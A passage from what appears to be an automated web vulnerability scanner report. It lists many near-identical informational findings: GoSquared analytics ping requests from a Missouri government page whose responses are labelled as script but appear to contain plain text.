30.93. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.7457810698542744/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.7457810698542744/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.7457810698542744/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:33:04 GMT
Expires: Tue, 05 Apr 2011 11:33:04
Server: nginx/0.8.54
X-Powered-By: PHP/5.3.5-0.dotdeb.0
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.94. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.7577714030630887/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.7577714030630887/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.7577714030630887/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:25:36 GMT
Expires: Tue, 05 Apr 2011 11:25:36
Server: nginx/0.8.54
X-Powered-By: PHP/5.3.5-0.dotdeb.0
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.95. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.7647813553921878/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.7647813553921878/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.7647813553921878/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:26:26 GMT
Expires: Tue, 05 Apr 2011 11:26:26
Server: nginx/0.8.54
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.96. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.771832418628037/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.771832418628037/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.771832418628037/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:28:38 GMT
Expires: Tue, 05 Apr 2011 11:28:38
Server: nginx/0.8.54
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.97. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.7730976778548211/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.7730976778548211/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.7730976778548211/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:31:58 GMT
Expires: Tue, 05 Apr 2011 11:31:58
Server: nginx/0.8.54
X-Powered-By: PHP/5.3.5-0.dotdeb.0
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.98. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.7768238643184304/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.7768238643184304/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.7768238643184304/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:28:05 GMT
Expires: Tue, 05 Apr 2011 11:28:05
Server: nginx/0.8.54
X-Powered-By: PHP/5.3.5-0.dotdeb.0
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.99. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.7811430096626282/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.7811430096626282/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.7811430096626282/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:41:55 GMT
Expires: Tue, 05 Apr 2011 11:41:55
Server: nginx/0.8.54
X-Powered-By: PHP/5.3.5-0.dotdeb.0
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.100. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.7813084367662668/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.7813084367662668/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.7813084367662668/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:45:48 GMT
Expires: Tue, 05 Apr 2011 11:45:48
Server: nginx/0.8.54
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.101. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.7839354085735977/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.7839354085735977/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.7839354085735977/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:51:03 GMT
Expires: Tue, 05 Apr 2011 11:51:03
Server: nginx/0.8.54
X-Powered-By: PHP/5.3.5-0.dotdeb.0
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.102. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.7843597154133022/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.7843597154133022/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.7843597154133022/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:56:20 GMT
Expires: Tue, 05 Apr 2011 11:56:19
Server: nginx/0.8.54
X-Powered-By: PHP/5.3.5-0.dotdeb.0
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.103. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.7869180392008275/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.7869180392008275/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.7869180392008275/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:49:08 GMT
Expires: Tue, 05 Apr 2011 11:49:08
Server: nginx/0.8.54
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.104. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.7918125691358/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.7918125691358/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.7918125691358/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:29:29 GMT
Expires: Tue, 05 Apr 2011 11:29:29
Server: nginx/0.8.54
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.105. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.8042216831818223/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.8042216831818223/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.8042216831818223/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:55:46 GMT
Expires: Tue, 05 Apr 2011 11:55:46
Server: nginx/0.8.54
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.106. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.8088590698316693/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.8088590698316693/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.8088590698316693/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:34:44 GMT
Expires: Tue, 05 Apr 2011 11:34:44
Server: nginx/0.8.54
X-Powered-By: PHP/5.3.5-0.dotdeb.0
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.107. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.8120218790136278/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.8120218790136278/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.8120218790136278/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:26:43 GMT
Expires: Tue, 05 Apr 2011 11:26:43
Server: nginx/0.8.54
X-Powered-By: PHP/5.3.5-0.dotdeb.0
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.108. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.8208005137275904/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.8208005137275904/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.8208005137275904/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:42:12 GMT
Expires: Tue, 05 Apr 2011 11:42:12
Server: nginx/0.8.54
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.109. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.8334101843647659/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.8334101843647659/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.8334101843647659/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:24:13 GMT
Expires: Tue, 05 Apr 2011 11:24:13
Server: nginx/0.8.54
X-Powered-By: PHP/5.3.5-0.dotdeb.0
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.110. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.8426639721728861/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.8426639721728861/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.8426639721728861/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:55:13 GMT
Expires: Tue, 05 Apr 2011 11:55:13
Server: nginx/0.8.54
X-Powered-By: PHP/5.3.5-0.dotdeb.0
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.111. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.8459921134635806/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.8459921134635806/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.8459921134635806/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:36:40 GMT
Expires: Tue, 05 Apr 2011 11:36:40
Server: nginx/0.8.54
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.112. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.8527416458819062/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.8527416458819062/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.8527416458819062/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:43:01 GMT
Expires: Tue, 05 Apr 2011 11:43:01
Server: nginx/0.8.54
X-Powered-By: PHP/5.3.5-0.dotdeb.0
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.113. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.8612566720694304/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.8612566720694304/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.8612566720694304/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:58:15 GMT
Expires: Tue, 05 Apr 2011 11:58:15
Server: nginx/0.8.54
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.114. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.888174522202462/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.888174522202462/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.888174522202462/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:51:20 GMT
Expires: Tue, 05 Apr 2011 11:51:20
Server: nginx/0.8.54
X-Powered-By: PHP/5.3.5-0.dotdeb.0
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.115. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.8932765168137848/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.8932765168137848/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.8932765168137848/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:43:18 GMT
Expires: Tue, 05 Apr 2011 11:43:18
Server: nginx/0.8.54
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.116. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.9015116489026695/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.9015116489026695/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.9015116489026695/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:58:32 GMT
Expires: Tue, 05 Apr 2011 11:58:32
Server: nginx/0.8.54
X-Powered-By: PHP/5.3.5-0.dotdeb.0
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.117. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.9020833417307585/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.9020833417307585/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.9020833417307585/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:25:52 GMT
Expires: Tue, 05 Apr 2011 11:25:52
Server: nginx/0.8.54
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.118. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.9022978853899986/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.9022978853899986/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

